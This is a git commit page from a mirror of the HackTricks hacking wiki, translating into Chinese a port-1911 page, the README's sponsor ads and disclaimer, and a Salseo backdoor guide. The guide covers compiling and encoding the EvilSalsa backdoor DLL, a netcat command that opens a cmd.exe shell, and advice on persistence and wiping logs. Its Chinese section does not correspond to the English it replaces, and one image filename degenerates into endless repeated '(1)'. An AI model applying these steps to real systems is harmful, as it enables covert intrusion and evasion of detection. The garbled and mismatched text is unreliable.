Mirrors/hacktricks
2
0
Fork 0
mirror of https://github.com/carlospolop/hacktricks synced 2024-11-25 06:00:40 +00:00
Code Issues Projects Releases Packages Wiki Activity

Translated ['1911-pentesting-fox.md', 'README.md', 'backdoors/salseo.md'

Browse source
This commit is contained in:
Translator 2023-12-30 12:15:15 +00:00
parent 5f8659f220
commit 3263468518
22 changed files with 1733 additions and 2449 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

44
1911-pentesting-fox.md
View file

@ -1,14 +1,16 @@
# 1911 - 渗透测试狐
# 1911 - 渗透测试狐
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks云 ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
<summary><strong>从零开始学习AWS黑客技术成为</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS红队专家)</strong></a><strong></strong></summary>
* 你在一家**网络安全公司**工作吗想要在HackTricks中看到你的**公司广告**吗?或者想要获得**PEASS的最新版本或下载HackTricks的PDF**吗?请查看[**订阅计划**](https://github.com/sponsors/carlospolop)
* 发现我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)收藏品[**The PEASS Family**](https://opensea.io/collection/the-peass-family)
* 获取[**官方PEASS和HackTricks周边产品**](https://peass.creator-spring.com)
* **加入**[**💬**](https://emojipedia.org/speech-balloon/) [**Discord群组**](https://discord.gg/hRep4RUj7f)或[**电报群组**](https://t.me/peass),或者**关注**我在**Twitter**上的[**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* **通过向**[**hacktricks repo**](https://github.com/carlospolop/hacktricks) **和**[**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) **提交PR来分享你的黑客技巧。**
支持HackTricks的其他方式
* 如果您想在**HackTricks中看到您的公司广告**或**下载HackTricks的PDF**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)
* 获取[**官方PEASS & HackTricks周边商品**](https://peass.creator-spring.com)
* 发现[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们独家的[**NFTs系列**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord群组**](https://discord.gg/hRep4RUj7f) 或 [**telegram群组**](https://t.me/peass) 或在**Twitter** 🐦 上**关注**我 [**@carlospolopm**](https://twitter.com/carlospolopm)**。**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来**分享您的黑客技巧。
</details>
@ -22,4 +24,30 @@ dht udp "DHT节点"
![](<.gitbook/assets/image (273).png>)
![](<.gitbook/assets/image (345) (2) (2) (2) (2) (2) (2) (2) (2) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1
![](<.gitbook/assets/image (345) (2) (2) (2) (2) (2) (2) (2) (2) (2) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (3).png>)
InfluxDB
![](<.gitbook/assets/image (337).png>)
![](<.gitbook/assets/image (338).png>)
![](<.gitbook/assets/image (339).png>)
![](<.gitbook/assets/image (340).png>)
![](<.gitbook/assets/image (341).png>)
<details>
<summary><strong>从零开始学习AWS黑客技术成为</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS红队专家)</strong></a><strong></strong></summary>
支持HackTricks的其他方式
* 如果您想在**HackTricks中看到您的公司广告**或**下载HackTricks的PDF**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)
* 获取[**官方PEASS & HackTricks周边商品**](https://peass.creator-spring.com)
* 发现[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们独家的[**NFTs系列**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord群组**](https://discord.gg/hRep4RUj7f) 或 [**telegram群组**](https://t.me/peass) 或在**Twitter** 🐦 上**关注**我 [**@carlospolopm**](https://twitter.com/carlospolopm)**。**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来**分享您的黑客技巧。
</details>

93
README.md
View file

@ -2,21 +2,21 @@
<figure><img src=".gitbook/assets/hacktricks.gif" alt=""><figcaption></figcaption></figure>
_Hacktricks logos & motion design by_ [_@ppiernacho_](https://www.instagram.com/ppieranacho/)_._
_HackTricks 标志和动态设计由_ [_@ppiernacho_](https://www.instagram.com/ppieranacho/)_提供。_
{% hint style="success" %}
**欢迎来到这个维基百科你将在这里找到我从CTF比赛、真实应用、研究和新闻中学到的每个黑客技巧/技术/其他内容。**
**欢迎来到这个维基,在这里你会找到我从 CTFs、真实应用、阅读研究和新闻中学到的每一个黑客技巧/技术/其他。**
{% endhint %}
要开始,请按照这个页面,你将找到**渗透测试**一个或多个**机器时应该遵循的典型流程**
要开始,请关注此页面,您将找到**您在对一个或多个**机器**进行渗透测试时应该遵循的**典型流程**
{% content-ref url="generic-methodologies-and-resources/pentesting-methodology.md" %}
[pentesting-methodology.md](generic-methodologies-and-resources/pentesting-methodology.md)
{% endcontent-ref %}
## 金赞助商
## 金赞助商
_你的公司可以在这里。_
_您的公司可以出现在这里。_
## 企业赞助商
@ -24,36 +24,36 @@ _你的公司可以在这里。_
<figure><img src=".gitbook/assets/stm (1).png" alt=""><figcaption></figcaption></figure>
[**STM Cyber**](https://www.stmcyber.com) 是一家很棒的网络安全公司,他们的口号是**HACK THE UNHACKABLE**。他们进行自己的研究并开发自己的黑客工具,以提供多种有价值的网络安全服务,如渗透测试、红队和培训。
[**STM Cyber**](https://www.stmcyber.com) 是一家出色的网络安全公司,其口号是**黑客攻击不可黑的**。他们进行自己的研究并开发自己的黑客工具,以**提供多种有价值的网络安全服务**,如渗透测试、红队和培训。
你可以在[**https://blog.stmcyber.com**](https://blog.stmcyber.com)查看他们的**博客**。
您可以在 [**https://blog.stmcyber.com**](https://blog.stmcyber.com) 查看他们的**博客**。
**STM Cyber** 支持像 HackTricks 这样的网络安全开源项目 :)
**STM Cyber** 支持像 HackTricks 这样的网络安全开源项目 :)
### [RootedCON](https://www.rootedcon.com/)
<figure><img src=".gitbook/assets/image (4) (1).png" alt=""><figcaption></figcaption></figure>
<figure><img src=".gitbook/assets/image (4) (1) (1).png" alt=""><figcaption></figcaption></figure>
[**RootedCON**](https://www.rootedcon.com) 是西班牙最重要的网络安全活动之一,也是欧洲最重要的网络安全活动之一。作为促进技术知识的使命,这个大会是技术和网络安全专业人士在各个领域的热点交流地
[**RootedCON**](https://www.rootedcon.com) 是**西班牙**最重要的网络安全活动,也是**欧洲**最重要的活动之一。这个大会的**使命是促进技术知识的传播**,是技术和网络安全专业人士在各个学科的沸腾交汇点
{% embed url="https://www.rootedcon.com/" %}
### [Intigriti](https://www.intigriti.com)
<figure><img src=".gitbook/assets/image (2) (1) (1) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
<figure><img src=".gitbook/assets/image (2) (1) (1) (1) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
**Intigriti** 是欧洲排名第一的道德黑客和漏洞赏金平台。
**Intigriti** 是**欧洲排名第一**的道德黑客和**漏洞赏金平台**
**漏洞赏金提示****注册** Intigriti一个由黑客创建的高级漏洞赏金平台立即加入我们开始赚取高达**10万美元**的赏金!
**漏洞赏金小贴士****注册** **Intigriti**,一个由黑客为黑客创建的高级**漏洞赏金平台**!立即加入我们 [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks),开始赚取高达 **$100,000** 的赏金!
{% embed url="https://go.intigriti.com/hacktricks" %}
### [Trickest](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks)
<figure><img src=".gitbook/assets/image (3) (1) (1).png" alt=""><figcaption></figcaption></figure>
<figure><img src=".gitbook/assets/image (3) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
\
使用 [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) 轻松构建和自动化由全球最先进的社区工具提供支持的工作流程
使用 [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) 轻松构建并**自动化工作流程**,由世界上**最先进**的社区工具提供支持
立即获取访问权限:
@ -63,32 +63,32 @@ _你的公司可以在这里。_
<figure><img src=".gitbook/assets/image (675).png" alt=""><figcaption></figcaption></figure>
在网络安全游戏中保持领先一步
在网络安全游戏中保持领先。
[**Intruder**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) 让漏洞管理变得简单。跟踪你的攻击面,了解你的公司存在哪些漏洞,并优先处理最容易暴露你系统的问题,这样你就可以专注于最重要的事情。
[**Intruder**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) 使漏洞管理变得简单。跟踪您的攻击面,了解您的公司哪里容易受到攻击,并优先处理使您的系统最容易暴露的问题,以便您可以专注于最重要的事情。
使用一个平台运行数千个检查覆盖你的整个技术栈包括内部基础设施、Web应用程序、API和云系统。与 [AWS、GCP、Azure](https://www.intruder.io/cloud-vulnerability-scanning-for-aws-google-cloud-and-azure) 无缝集成,简化DevOps使你的团队能够更快地实施修复措施
通过一个平台运行数千项检查涵盖从内部基础设施到网络应用、API 和云系统的整个技术栈。与 [AWS, GCP, Azure](https://www.intruder.io/cloud-vulnerability-scanning-for-aws-google-cloud-and-azure) 无缝集成,并简化 DevOps以便您的团队可以更快地实施修复
Intruder 从不休息。全天候保护监控你的系统。想了解更多?访问他们的网站,并通过[**免费试用**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks)来体验一下
Intruder 从不休息。全天候保护 24/7 监控您的系统。想了解更多?访问他们的网站,并通过[**免费试用**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks)进行体验
{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %}
### [HACKENPROOF](https://bit.ly/3xrrDrL)
<figure><img src=".gitbook/assets/image (5).png" alt=""><figcaption></figcaption></figure>
<figure><img src=".gitbook/assets/image (5) (1).png" alt=""><figcaption></figcaption></figure>
加入 [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) 服务器,与经验丰富的黑客和赏金猎人交流!
加入 [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) 服务器,与经验丰富的黑客和漏洞赏金猎人交流!
**黑客见解**\
**黑客洞察**\
参与深入探讨黑客的刺激和挑战的内容
**实时黑客新闻**\
通过实时新闻和见解了解快节奏的黑客世界
通过实时新闻和洞察,跟上快节奏的黑客世界
**最新公告**\
了解最新的漏洞赏金发布和重要的平台更新
通过最新的漏洞赏金发布和关键平台更新,保持信息的更新
**加入我们的** [**Discord**](https://discord.com/invite/N3FrSbmwdy),与顶级黑客合作!
**加入我们的** [**Discord**](https://discord.com/invite/N3FrSbmwdy) 并开始与顶尖黑客合作!
***
@ -96,50 +96,51 @@ Intruder 从不休息。全天候保护监控你的系统。想了解更多?
<figure><img src=".gitbook/assets/websec (1).svg" alt=""><figcaption></figcaption></figure>
[**WebSec**](https://websec.nl) 是一家位于**阿姆斯特丹**的专业网络安全公司,通过提供**攻击性安全服务**以**现代化**的方式帮助全球各地的企业抵御最新的网络安全威胁
[**WebSec**](https://websec.nl) 是一家位于**阿姆斯特丹**的专业网络安全公司,帮助**全世界**的企业防范最新的网络安全威胁,提供**攻击性安全服务**,采用**现代**方法
WebSec 是一家**全方位的安全公司**,他们可以做到所有的事情;渗透测试、安全审计、安全意识培训、钓鱼活动、代码审查、漏洞利用开发、安全专家外包等等。
WebSec 是一家**一站式安全公司**,这意味着他们做所有事情;渗透测试、**安全**审计、意识培训、网络钓鱼活动、代码审查、漏洞开发、安全专家外包等等。
WebSec 的另一个很酷的地方是与行业平均水平不同WebSec 对自己的技能非常有信心,以至于他们保证提供最优质的结果,他们的网站上写着“**如果我们无法入侵,你就不需要支付费用!**”。想了解更多信息,请查看他们的[**网站**](https://websec.nl/en/)和[**博客**](https://websec.nl/blog/)
WebSec 的另一个酷炫之处在于与行业平均水平不同WebSec 对他们的技能**非常自信**,以至于他们**保证最佳质量结果**,他们的网站上写着“**如果我们黑不了,你就不用付钱!**”。更多信息请查看他们的[**网站**](https://websec.nl/en/)和[**博客**](https://websec.nl/blog/)
除了以上内容WebSec 还是 HackTricks 的**忠实支持者**。
除了上述内容WebSec 还是**HackTricks 的坚定支持者。**
{% embed url="https://www.youtube.com/watch?v=Zq2JycGDCPM" %}
### [DragonJAR](https://www.dragonjar.org/)
<figure><img src=".gitbook/assets/image (1) (1) (2) (4) (1).png" alt=""><figcaption></figcaption></figure>
[**DragonJAR一家位于哥伦比亚领先攻击性网络安全公司**](https://www.dragonjar.org/)。DragonJAR提供[全面的攻击性网络安全服务,如**渗透测试**](https://www.dragonjar.org/servicios-de-seguridad-informatica)在各个领域和几乎**任何技术****红队**攻击模拟,**物理**安全测试,**压力测试**,社会工程,源代码安全审查和网络安全培训。此外,他们还组织了**DragonJAR安全会议**[一个国际网络安全大会](https://www.dragonjarcon.org/),已经举办了十多年,成为西班牙语地区最新安全研究的展示窗口,具有重要的影响力。
[**DragonJAR 是哥伦比亚领先攻击性网络安全公司**](https://www.dragonjar.org/)。DragonJAR 提供[全面的攻击性网络安全服务,如**渗透测试**](https://www.dragonjar.org/servicios-de-seguridad-informatica)在各个领域和几乎**任何技术****红队**攻击模拟,**物理**安全测试,**压力测试**,社会工程,源**代码安全审查**,以及网络安全培训。此外,他们还组织**DragonJAR 安全会议**[一个国际网络安全大会](https://www.dragonjarcon.org/),已经举办了十多年,成为展示西班牙语最新安全研究的橱窗,并在该地区具有很大的影响力。
[**DragonJAR is a leading offensive cybersecurity company**](https://www.dragonjar.org/) **located in Colombia**. DragonJAR offers [comprehensive offensive cybersecurity services, such as **pentesting**](https://www.dragonjar.org/servicios-de-seguridad-informatica) in various areas and practically **any technology**, **Red Team** attack simulations, **physical** security testing, **stress testing**, social engineering, source **code security review**, and cybersecurity training. Additionally, they organize the **DragonJAR Security Conference**, [an international cybersecurity congress](https://www.dragonjarcon.org/) that has been held for over a decade, becoming a showcase for the latest security research in Spanish and of great relevance in the region.
## 许可证
## License
**版权所有 © Carlos Polop 2023。除非另有规定复制到本书中的外部信息属于原始作者否则Carlos Polop的**[**HACK TRICKS**](https://github.com/carlospolop/hacktricks)**的文本受**[**署名-非商业性使用 4.0 国际 (CC BY-NC 4.0)**](https://creativecommons.org/licenses/by-nc/4.0/)**许可。**\
**如果您想以商业目的使用它,请与我联系。**
**版权 © Carlos Polop 2023。除非另有说明书中复制的外部信息属于原作者[**HACK TRICKS**](https://github.com/carlospolop/hacktricks) 上的文本由 Carlos Polop 根据**[**署名-非商业性使用 4.0 国际 (CC BY-NC 4.0)**](https://creativecommons.org/licenses/by-nc/4.0/)**许可。**\
**如果您想出于商业目的使用它,请与我联系。**
## **免责声明**
{% hint style="danger" %}
本书《HackTricks》仅供教育和信息目的。本书的内容基于“原样”提供,作者和出版商对本书中包含的信息、产品、服务或相关图形的完整性、准确性、可靠性、适用性或可用性不作任何明示或暗示的陈述或保证。因此,您对此类信息的任何依赖完全由您自己承担风险。
本书《HackTricks》仅供教育和信息目的使用。本书中的内容是按“原样”提供的,作者和出版商不对信息的完整性、准确性、可靠性、适用性或本书中包含的信息、产品、服务或相关图形的可用性做出任何明示或暗示的陈述或保证。因此,您对此类信息的依赖完全由您自己承担风险。
作者和出版商在任何情况下均不对任何损失或损害(包括但不限于间接或后果性的损失或损害,或因使用本书而导致的数据或利润的任何损失或损害)承担责任,或与使用本书有关
在任何情况下,作者和出版商均不对任何损失或损害承担责任,包括但不限于间接或相应的损失或损害,或因使用本书或与之相关的信息而引起的任何数据或利润损失
此外,本书中描述的技术和技巧仅供教育和信息目的,不得用于任何非法或恶意活动。作者和出版商不赞同或支持任何非法或不道德的活动,任何使用本书中包含的信息都由用户自行承担风险和决定。
此外,本书中描述的技术和提示仅供教育和信息目的使用,不应用于任何非法或恶意活动。作者和出版商不赞成或支持任何非法或不道德的活动,本书中包含的信息的任何使用均由用户自行承担风险和酌情决定。
用户对基于本书中包含的信息采取的任何行动负全部责任,并在尝试实施本书中描述的任何技术或技巧时,应始终寻求专业建议和帮助。
用户对基于本书中包含的信息采取的任何行动负全部责任,并在尝试实施本书中描述的任何技术或提示时始终寻求专业的建议和协助。
通过使用本书,用户同意免除作者和出版商对因使用本书或其中包含的任何信息而可能导致的任何损害、损失或伤害的任何责任和责任。
通过使用本书,用户同意免除作者和出版商对因使用本书或其中包含的任何信息而可能导致的任何损害、损失或伤害的所有责任和责任。
{% endhint %}
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
<summary><strong>从零开始学习 AWS 黑客攻击,成为</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS 红队专家)</strong></a><strong></strong></summary>
* 您在**网络安全公司**工作吗您想在HackTricks中看到您的**公司广告**吗?或者您想获得**PEASS的最新版本或下载PDF格式的HackTricks**吗?请查看[**订阅计划**](https://github.com/sponsors/carlospolop)
* 发现我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)收藏品[**The PEASS Family**](https://opensea.io/collection/the-peass-family)
* 获得[**官方PEASS和HackTricks周边产品**](https://peass.creator-spring.com)
* **加入**[**💬**](https://emojipedia.org/speech-balloon/) [**Discord群组**](https://discord.gg/hRep4RUj7f)或[**电报群组**](https://t.me/peass),或在**Twitter**上**关注**我[**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* **通过向**[**hacktricks repo**](https://github.com/carlospolop/hacktricks) **和**[**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) **提交PR来分享您的黑客技巧。**
支持 HackTricks 的其他方式:
* 如果您想在 HackTricks 中看到您的**公司广告**或**下载 HackTricks 的 PDF** 版本,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)
* 获取[**官方 PEASS & HackTricks 商品**](https://peass.creator-spring.com)
* 发现[**PEASS 家族**](https://opensea.io/collection/the-peass-family),我们独家的[**NFTs 集合**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**telegram 群组**](https://t.me/peass) 或在 **Twitter** 🐦 上**关注**我 [**@carlospolopm**](https://twitter.com/carlospolopm)**。**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享您的黑客技巧。
</details>

186
backdoors/salseo.md
View file

@ -2,13 +2,15 @@
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
<summary><strong>从零到英雄学习AWS黑客技术</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong></strong></summary>
* 你在一家**网络安全公司**工作吗想要在HackTricks中**宣传你的公司**吗?或者你想要**获取PEASS的最新版本或下载HackTricks的PDF**吗?请查看[**订阅计划**](https://github.com/sponsors/carlospolop)
* 发现我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)收藏品[**The PEASS Family**](https://opensea.io/collection/the-peass-family)
* 获取[**官方PEASS和HackTricks的衣物**](https://peass.creator-spring.com)
* **加入**[**💬**](https://emojipedia.org/speech-balloon/) [**Discord群组**](https://discord.gg/hRep4RUj7f)或[**电报群组**](https://t.me/peass),或者**关注**我在**Twitter**上的[**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* **通过向**[**hacktricks repo**](https://github.com/carlospolop/hacktricks) **和**[**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) **提交PR来分享你的黑客技巧。**
支持HackTricks的其他方式
* 如果你想在**HackTricks中看到你的公司广告**或**下载HackTricks的PDF**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)
* 获取[**官方PEASS & HackTricks商品**](https://peass.creator-spring.com)
* 发现[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们独家的[**NFTs系列**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord群组**](https://discord.gg/hRep4RUj7f)或[**telegram群组**](https://t.me/peass)或在**Twitter** 🐦 上**关注**我 [**@carlospolopm**](https://twitter.com/carlospolopm)**。**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享你的黑客技巧。
</details>
@ -16,21 +18,21 @@
从github下载源代码并编译**EvilSalsa**和**SalseoLoader**。你需要安装**Visual Studio**来编译代码。
将这些项目编译为你将要使用它们的Windows系统的架构如果Windows支持x64则编译为该架构)。
为你将要使用它们的windows盒子的架构编译这些项目如果Windows支持x64为那个架构编译它们)。
你可以在Visual Studio中的**左侧"Build"选项卡**中选择架构,在**"Platform Target"**中
你可以在Visual Studio的左侧**"Build"标签**中**"Platform Target"**选择架构
(\*\*如果你找不到这些选项,请点击**"Project Tab"**,然后点击**"\<Project Name> Properties"**)
**如果你找不到这个选项,点击**"Project Tab"**然后点击**"\<Project Name> Properties"**
![](<../.gitbook/assets/image (132).png>)
然后,构建这两个项目Build -> Build Solution在日志中将显示可执行文件的路径):
然后,构建两个项目Build -> Build Solution日志中会显示可执行文件的路径):
![](<../.gitbook/assets/image (1) (2) (1) (1) (1).png>)
## 准备后门
首先,你需要对**EvilSalsa.dll**进行编码。你可以使用python脚本**encrypterassembly.py**或者编译项目**EncrypterAssembly**来进行编码
首先,你需要编码**EvilSalsa.dll**。为此,你可以使用python脚本**encrypterassembly.py**或者你可以编译项目**EncrypterAssembly**
### **Python**
```
@ -39,78 +41,54 @@ python EncrypterAssembly/encrypterassembly.py EvilSalsax.dll password evilsalsa.
```
### Windows
#### Salseo Backdoor
Windows操作系统是全球最广泛使用的桌面操作系统。由于其普及性它成为黑客攻击的主要目标之一。在Windows系统中植入后门可以让攻击者长期控制目标系统。
The Salseo backdoor is a type of malware that provides unauthorized access to a compromised Windows system. It is designed to remain hidden and undetected, allowing an attacker to maintain persistent control over the infected machine.
#### 创建后门
##### Functionality
在Windows中创建后门的一种常见方法是使用`netcat`。`netcat`是一个功能强大的网络工具,可以用于监听端口、连接到服务以及传输数据。
Once installed on a target system, the Salseo backdoor establishes a covert communication channel with a remote command and control (C2) server. This allows the attacker to remotely execute commands on the compromised system and retrieve sensitive information.
例如以下命令将在目标机器上打开一个反向shell允许攻击者远程执行命令
The backdoor is capable of performing various malicious activities, including:
```
nc -lvp 4444 -e cmd.exe
```
1. **Remote Access**: The attacker can gain full control over the infected system, enabling them to perform actions as if they were physically present.
#### 维持访问
2. **Data Exfiltration**: The backdoor can steal sensitive data from the compromised system, such as login credentials, financial information, or intellectual property.
为了确保即使在系统重启后也能保持对目标系统的访问,攻击者通常会在系统中创建持久性机制。这可以通过多种方式实现,例如注册表键值、计划任务或服务。
3. **Keylogging**: Salseo can capture keystrokes, allowing the attacker to monitor and record user activities, including passwords and other confidential information.
#### 清理痕迹
4. **File Manipulation**: The backdoor can create, modify, or delete files on the compromised system, giving the attacker the ability to plant additional malware or tamper with existing files.
在执行任何后门操作后,清理痕迹是至关重要的。这包括删除系统日志、清除命令历史记录以及隐藏文件和进程。
5. **System Surveillance**: Salseo can gather information about the infected system, such as hardware specifications, installed software, and network configurations. This information can be used to identify potential vulnerabilities or gather intelligence for future attacks.
#### 检测和防御
##### Infection Vectors
检测Windows后门通常涉及监控异常网络流量、检查系统日志以及使用反病毒软件。防御措施包括定期更新系统、使用复杂密码以及限制对敏感资源的访问。
The Salseo backdoor can be delivered through various infection vectors, including:
1. **Email Attachments**: Malicious email attachments, such as infected documents or executables, can be used to deliver the backdoor to unsuspecting users.
2. **Drive-by Downloads**: Visiting compromised or malicious websites can result in the automatic download and execution of the Salseo backdoor.
3. **Exploiting Vulnerabilities**: The backdoor can be delivered by exploiting vulnerabilities in software or operating systems, allowing the attacker to gain unauthorized access to the target system.
##### Detection and Prevention
Detecting and preventing the Salseo backdoor requires a multi-layered approach, including:
